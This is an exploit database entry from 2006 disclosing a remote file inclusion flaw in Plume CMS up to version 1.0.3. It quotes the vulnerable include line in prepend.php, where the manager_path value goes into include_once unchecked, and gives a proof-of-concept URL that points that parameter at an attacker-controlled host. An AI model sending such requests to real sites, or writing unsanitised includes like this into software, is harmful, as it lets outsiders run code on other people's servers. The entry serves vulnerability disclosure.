Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability

2006-05-26T00:00:00
ID 1337DAY-ID-449
Type zdt
Reporter beford
Modified 2006-05-26T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===================================================================
Plume CMS <= 1.0.3 (manager_path) Remote File Include Vulnerability
===================================================================




Vendor: Plume CMS http://plume-cms.net
Vuln: Remote File Include
Discovered: beford <xbefordx gmail com>

Vulnerable File/Code

./plume-1.0.3/manager/frontinc/prepend.php

[code]
include_once $_PX_config['manager_path'].'/conf/config.php';
[/code]

http://urlanda.org/manager/frontinc/prepend.php?_PX_config[manager_path]=http://leet



#  0day.today [2018-01-08]  #